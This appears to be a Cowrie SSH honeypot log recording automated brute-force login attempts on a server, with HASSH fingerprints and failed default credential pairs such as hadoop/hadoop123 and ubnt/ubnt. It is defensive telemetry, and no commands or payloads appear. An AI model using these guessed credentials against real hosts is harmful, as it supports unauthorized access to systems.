{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:18:06.695318Z","src_ip":"212.227.125.160","session":"b553dd66ab38"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:18:06.696144Z","src_ip":"212.227.125.160","session":"b553dd66ab38"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"dolphinscheduler","message":"login attempt [dolphinscheduler/dolphinscheduler] failed","sensor":"my-vps","timestamp":"2025-08-26T11:18:07.122897Z","src_ip":"212.227.125.160","session":"b553dd66ab38"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:18:08.181796Z","src_ip":"212.227.125.160","session":"b553dd66ab38"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51148,"dst_ip":"1.2.3.4","dst_port":22,"session":"93df1bb487de","protocol":"ssh","message":"New connection: 212.227.125.160:51148 (1.2.3.4:22) [session: 93df1bb487de]","sensor":"my-vps","timestamp":"2025-08-26T11:18:13.170427Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:18:13.173073Z","src_ip":"212.227.125.160","session":"93df1bb487de"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:18:13.241626Z","src_ip":"212.227.125.160","session":"93df1bb487de"}
{"eventid":"cowrie.login.failed","username":"grid","password":"grid","message":"login attempt [grid/grid] failed","sensor":"my-vps","timestamp":"2025-08-26T11:18:13.492701Z","src_ip":"212.227.125.160","session":"93df1bb487de"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:18:14.845573Z","src_ip":"212.227.125.160","session":"93df1bb487de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51918,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5741cee97b3","protocol":"ssh","message":"New connection: 212.227.125.160:51918 (1.2.3.4:22) [session: f5741cee97b3]","sensor":"my-vps","timestamp":"2025-08-26T11:18:19.207864Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:18:19.312248Z","src_ip":"212.227.125.160","session":"f5741cee97b3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:18:19.313273Z","src_ip":"212.227.125.160","session":"f5741cee97b3"}
{"eventid":"cowrie.login.failed","username":"emregover","password":"emregover","message":"login attempt [emregover/emregover] failed","sensor":"my-vps","timestamp":"2025-08-26T11:18:19.789284Z","src_ip":"212.227.125.160","session":"f5741cee97b3"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:18:20.846402Z","src_ip":"212.227.125.160","session":"f5741cee97b3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52688,"dst_ip":"1.2.3.4","dst_port":22,"session":"e544ab9ddaf8","protocol":"ssh","message":"New connection: 212.227.125.160:52688 (1.2.3.4:22) [session: e544ab9ddaf8]","sensor":"my-vps","timestamp":"2025-08-26T11:18:25.019018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:18:25.020580Z","src_ip":"212.227.125.160","session":"e544ab9ddaf8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:18:25.071068Z","src_ip":"212.227.125.160","session":"e544ab9ddaf8"}
{"eventid":"cowrie.login.failed","username":"minecraft","password":"123456","message":"login attempt [minecraft/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:18:25.275960Z","src_ip":"212.227.125.160","session":"e544ab9ddaf8"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:18:26.329529Z","src_ip":"212.227.125.160","session":"e544ab9ddaf8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53456,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cbe827967a4","protocol":"ssh","message":"New connection: 212.227.125.160:53456 (1.2.3.4:22) [session: 4cbe827967a4]","sensor":"my-vps","timestamp":"2025-08-26T11:18:30.828867Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:18:30.958654Z","src_ip":"212.227.125.160","session":"4cbe827967a4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:18:30.959842Z","src_ip":"212.227.125.160","session":"4cbe827967a4"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop123","message":"login attempt [hadoop/hadoop123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:18:31.277733Z","src_ip":"212.227.125.160","session":"4cbe827967a4"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:18:32.339792Z","src_ip":"212.227.125.160","session":"4cbe827967a4"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":60276,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff98c3d45708","protocol":"ssh","message":"New connection: 196.251.86.249:60276 (1.2.3.4:22) [session: ff98c3d45708]","sensor":"my-vps","timestamp":"2025-08-26T11:18:35.830778Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:18:36.390145Z","src_ip":"196.251.86.249","session":"ff98c3d45708"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:18:36.390853Z","src_ip":"196.251.86.249","session":"ff98c3d45708"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54224,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef1744d1be5d","protocol":"ssh","message":"New connection: 212.227.125.160:54224 (1.2.3.4:22) [session: ef1744d1be5d]","sensor":"my-vps","timestamp":"2025-08-26T11:18:36.741378Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:18:36.742007Z","src_ip":"212.227.125.160","session":"ef1744d1be5d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:18:36.798147Z","src_ip":"212.227.125.160","session":"ef1744d1be5d"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T11:18:36.981607Z","src_ip":"212.227.125.160","session":"ef1744d1be5d"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:18:38.032674Z","src_ip":"212.227.125.160","session":"ef1744d1be5d"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"pass","message":"login attempt [hadoop/pass] failed","sensor":"my-vps","timestamp":"2025-08-26T11:18:38.119569Z","src_ip":"196.251.86.249","session":"ff98c3d45708"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:18:39.688851Z","src_ip":"196.251.86.249","session":"ff98c3d45708"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54990,"dst_ip":"1.2.3.4","dst_port":22,"session":"b06be5d6d838","protocol":"ssh","message":"New connection: 212.227.125.160:54990 (1.2.3.4:22) [session: b06be5d6d838]","sensor":"my-vps","timestamp":"2025-08-26T11:18:43.538017Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:18:43.545097Z","src_ip":"212.227.125.160","session":"b06be5d6d838"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:18:44.399329Z","src_ip":"212.227.125.160","session":"b06be5d6d838"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop","message":"login attempt [hadoop/hadoop] failed","sensor":"my-vps","timestamp":"2025-08-26T11:18:45.630721Z","src_ip":"212.227.125.160","session":"b06be5d6d838"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:18:46.693675Z","src_ip":"212.227.125.160","session":"b06be5d6d838"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55760,"dst_ip":"1.2.3.4","dst_port":22,"session":"3bb1ed1b28a0","protocol":"ssh","message":"New connection: 212.227.125.160:55760 (1.2.3.4:22) [session: 3bb1ed1b28a0]","sensor":"my-vps","timestamp":"2025-08-26T11:18:50.098071Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:18:50.099090Z","src_ip":"212.227.125.160","session":"3bb1ed1b28a0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:18:50.159616Z","src_ip":"212.227.125.160","session":"3bb1ed1b28a0"}
{"eventid":"cowrie.login.failed","username":"news","password":"news","message":"login attempt [news/news] failed","sensor":"my-vps","timestamp":"2025-08-26T11:18:50.341742Z","src_ip":"212.227.125.160","session":"3bb1ed1b28a0"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:18:51.404343Z","src_ip":"212.227.125.160","session":"3bb1ed1b28a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56526,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a20ac58961d","protocol":"ssh","message":"New connection: 212.227.125.160:56526 (1.2.3.4:22) [session: 0a20ac58961d]","sensor":"my-vps","timestamp":"2025-08-26T11:18:55.622478Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:18:56.031505Z","src_ip":"212.227.125.160","session":"0a20ac58961d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:18:56.032601Z","src_ip":"212.227.125.160","session":"0a20ac58961d"}
{"eventid":"cowrie.login.failed","username":"kingbase","password":"123456","message":"login attempt [kingbase/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:18:57.011922Z","src_ip":"212.227.125.160","session":"0a20ac58961d"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:18:58.387180Z","src_ip":"212.227.125.160","session":"0a20ac58961d"}
